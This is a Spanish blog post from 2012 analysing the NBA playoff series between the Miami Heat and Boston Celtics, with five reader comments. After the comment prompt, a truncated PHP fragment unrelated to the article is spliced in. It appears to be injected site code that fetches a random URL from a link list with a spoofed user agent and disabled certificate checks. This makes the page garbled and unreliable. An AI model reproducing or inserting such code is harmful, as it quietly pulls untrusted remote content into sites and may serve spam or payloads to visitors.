Análisis Heat (2) vs Celtics (4)

28 de May de 2012 por TheDeerHunter

Regular: 1-3

Heat: 98.5 PF – 92.5 PC
Celtics: 91.9 PF – 89.3 PC

No será que no existen precedentes. Ni uno sólo de los reputados analistas de la ESPN otorga la más mínima opción a los Boston Celtics. Si acaso se plantean si caerán en 5 o en 6. Habiéndoles plantado tanta cara en la regular (72 y 66 puntos anotados por Miami en dos de esas tres derrotas) y sin el concurso seguro de Chris Bosh ¿no se antojan algo temerarios esos pronósticos?

Sorprende tal subidón de confianza. Me habría gustado a preguntar a los mismos cuánto daban por los Heat hace muy pocos días, con los Pacers 2 a 1, Bosh lesionado para toda la serie y Wade mostrando la peor cara de toda su carrera. Ya se sabe cómo es esto: sensaciones inmediatas.

Es cierto que los Pacers parecían más complicados que los Sixers, que mientras unos han doblegado a los primeros sin interiores, con apenas dos tíos y en 6 partidos, los Celtics se han desgastado más de la cuenta ante Philadelphia (y Hawks) en 7, para un total de 13. También que es difícil creer que Allen pueda hacer torcer el gesto a Wade, o que Pierce no vaya a sufrir contra LeBron. Las sensaciones son que los Celtics están día a día más castigados físicamente mientras que los Heat, con una baja tan crítica como la de Bosh, han encontrado su mejor baloncesto del curso.

Sin embargo, que los Heat tengan clara una cosa: los Celtics no son los Pacers. A los verdes no los van a acongojar con dos guantazos, dos carreras y dos mates. Hay pocos que tengan dentro un genoma de campeón como ese y han demostrado que no se rinden nunca. Harán bien en tomar nota. Pueden estar seguros de que les harán pagar caro cada error que cometan.

Claves de la eliminatoria

raywade

– El estado físico: Ver a los Celtics volver al vestuario tras un partido debe de ser parecido a ver a la compañía “Easy” tras la batalla de las Ardenas (Fo… y machacados sin remedio). Muy castigados en general, pero particularmente con la baja segura de Bradley y pendientes del concurso de Pietrus, así como de las prestaciones que pueda ofrecer el tobillo de Ray. Por otro lado la ausencia definitiva podría ser la de Bosh.

– El ritmo: Rondo no tiene nada que ver a los bases de New York ni Indiana. No va a resultar tan fácil inflar al rival a contraataques. Miami no ataca igual contra defensa estática y cerrada, pero si logran imponer un ritmo alto no habrá serie.

– Duelo Rivers-Spoelstra: Es otra de las ventajas con las que cuenta Boston y que el personal parece olvidar. El viejo Doc es uno de los técnicos más brillantes que queda en activo. Spoelstra está permanentemente cuestionado incluso por sus propios hombres.

– Parar a Wade: Ahora mismo pensar en Allen secando a Wade parece una quimera, y eso que el bueno de Ray llegó a dar lecciones magistrales en defensa. Veremos qué opciones colectivas plantea Doc.

– El juego interior: Confieso que en mí despierta una morbosa curiosidad ver a LeBron de 4 ante los perros de presa rivales.

Pronóstico

Con Bosh operativo pasará Miami. Si no 2-4 para Boston.

Comenta

5 comentarios a esta entrada

  1. nba dice:
    #1

    Yo creo que el devenir de esta serie dependera de lo que pueda aportar Garnett

      Citar

  2. jose antonio ramirez dice:
    #2

    Hola a todos, despues de mucho tiempo estamos de vuelta. Por fin un analisis de una eliminatoria de boston celtics en las que cuentan con ellos para pasar de ronda. Es increible los anti-celtics que son los del plus y en general los medios de este pais y el asco que me dan, cuando la esencia de este deporte esta como cada año y ya van muchos en estos jugadores que dia tras dia nos demuestran que el baloncesto es algo mas que pegar saltos y correr. No dire que mi analisis sea objetivo porque son mis celtics, pero solo dire respecto a lo dicho por el redactor, que este equipo transmite algo, no se sabe que es muy bien, pero te EMOCIONAN, porque la leyenda de los verdes y el corazon se siente aunque lo veas al otro lado del mundo y eso amigos, me parece tremendo. Podriamos discutir que si tiene armas boston o no, que no las tiene, que miami tiene mas fisico, que lo tiene, mas profundidad, que lo tienen y aun asi flota en el aire o en el ambiente esa sensacion de que esta pelicula ya lo hemos visto y que estos jugadores no se les puede enterrar nunca, jamas, y que son mas que capaces de pasar de ronda, asi de claro. Porque son los celtics, con estos jugadores, y llevan muchos años ya demostrandonos que son el unico equipo de la nba que es capaz de hacer machadas y que te trasmitan algo mas alla del basket. Un aplauso para el redactor porque le caeran palos por el pronostico, pero aunque no pasen, den por seguro que le amargaran la vida a miami, y que no se despisten mucho… La definicion a todo esto, se resume muy facilmente: vean la plantilla de boston y piensen que como es posible que pese al equipo que tienen, sean tenidos en cuenta. Porque los mismos que los entierran, por dentro saben y no lo reconocen, que son capaces de liarla. Y tienen miedo ¿Porque? Porque son los celtics. Que grande es ser seguidor de un equipo y que pese a las adversidades y antes de que empieze una serie estes contento pase lo que pase al final. Porque sabes que mas no se puede dar. Nota: Haber si de una vez se reconoce como es debido a rondo, ya deje escrito por aqui que es el mejor base de la nba con diferencia. No se puede hacer mas, es que no se puede. Cuando se harte de hacer triples dobles, que le pedireis, ¿cuadruples dobles? jajajaja. Los seguidores de los celtics mira como nos reimos. Pase lo que pase. Nos sobra con lo que sentimos

      Citar

  3. Sancho88 dice:
    #3

    nba:
    Yo creo que el devenir de esta serie dependera de lo que pueda aportar Garnett

    Totalmente de acuerdo, me lo has quitado de la boca porque eso era lo que iba a decir yo. Garnett tendrá mucha responsabilidad ne todos los aspectos. Muchos esperamos que deje en evidencia al juego interior de los Heat. Si West y Hibbert no lo consiguieran en el global de la eliminatoria, eso no quiere decir que no sean totalmente batibles. Yo pienso 4-2 para Heat en partidos perros, lo que pasa es que es muy difícil parar el juego de Miami. A ver, pero no imposible. Si les obligas a jugar en estático, la cagarán. A ver, para joder a los Heat les tienes que hacer una defensa fuerte a media cancha o incluso a tres cuartos, es decir, desde que cogen el rebote, ladrarles en la puta oreja, y en eso los Celtics son expertos. Juego físico, pero claro… qué difícil es aguantar para los Celtics. Les faltan elementos desde el banquillo y Allen, que está reventado, pero no es imposible. La clave del estado físico es clave… nunca mejor dicho. A ver si aguantan ahí Celtics, hay ganas de ver partidos apretados hasta el final.

    Parar a los Heat es parar su juego fácil en el que cortan la línea de pase o cogen el rebote defensivo y en tres pases en zig zag con Wade y Lebron y uno más, pum, te hacen la canasta fácil. Eso se puede parar eh? Los Heat no son invencibles, ni han inventado el baloncesto, ni siquiera juegan bien bien en todos los aspectos. De hecho, creo que todos estamos sorprendidos por el gran juego de los últimos tres partidos…

    Ya digo, defensa fuerte a media cancha o tres cuartos, juego físico, darles leña, voces en la puta oreja… todo lo que haga falta. Bass se tiene que poner fuerte atrás, igual que Garnett. Y Stiemsma también debe aportar.

    Y por qué digo esto? Porque aunque parezca loco, los Heat juegan igual que Palencia Baloncesto, jaajjaja, salvando absolutamente todas las galaxias y años luz de diferencia que hay entre ambos. Ese equipo juega así, corriendo y dando pases fáciles, o tirando triples desde la esquina. Esto se para así, siendo sucios y guarros. Ya lo veréis

      Citar

  4. MagicJohnson32 dice:
    #4

    Sancho88: …los Heat juegan igual que Palencia Baloncesto…

    Eres lo más grande.

      Citar

  5. GreenPride dice:
    #5

    Voy a comentar la eliminatoria antes de ponerme a ver el primer partido disputado anoche.
    Bueno pues antes de empezar a comentar voy a decir por si no queda claro con mi nombre que soy seguidor celtic desde siempre.
    Dicho esto, no veo cómo los Celtics pueden hacer daño a los Heat en estas series y la razón es muy fácil, el ataque de Boston contra la defensa de Miami y la condición física. El ataque de los Celtics está teniendo dos nucleos de anotación en estos PO. Uno, Garnett que está realmente impresionante y creo que en esta serie va a dominar la pintura y a hacer una gran serie (probablemente 20+10 en la mayoría de partidos). El problema está en el otro jugador, Paul Pierce. Un super clase como él está medio lesionado y además bailará con la más fea, LeBron. Si ha sufrido mucho para anotar ante Iguodala, ante LeBron las va a pasar canutas y más sin llegar al 100%. Esto va a provocar que los Cetics tengan muchos problemas de anotación ya que su mejor hombre (Rondo) es un base fenomenal pero que no destaca precisamente por su anotación. Aquí es clave es estado físico del resto ya que con Ray Allen sano (y ya no digo con Bradley en cancha) podríamos estar hablando de otra cosa. Pero Bradley no está y Ray tiene los tobillos hechos tan picón que no le entrán ni los tiros libres.
    Estoy de acuerdo en que los Celtics son un equipo con mucho orgullo y oficio y que darán problemas a los Heat, defenderán bien a Wade pero no creo que puedan con la fuerza de LeBron. La clave es cerrarse mucho e intentar que tanto Wade como LeBron no tengan bandejas ni tiros desde dentro y que se tengan que dedicar a lanzar de fuera. Yo intentaría usar bastante la zona como hicieron el año pasado los Mavs. Tendrá que haber muchas ayudas y los triples de Miller, Chalmers y Battier van a ser decisivos. Si entran, creo que la serie será más o menos fácil para los Heat, si no podría complicárseles algo.
    En definitiva, he de decir que lamentablemente estoy de acuerdo con los analistas de la ESPN, no veo opciones reales para los Celtics más allá de hacer sudar a los Heat y ganarles 1 o como mucho 2 partidos, sobre todo al abrigo de su Garden. Dicho esto ojalá me equivoque pero será un gusto sentarme a ver la última cabalgada de este Big Three convertido en Big Four de los Celtics que tan buenos años nos ha dado y que ha devuelto el orgullo a los verdes. Gracias a ellos, sois grandes… pero esta vez creo que no podrá ser.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>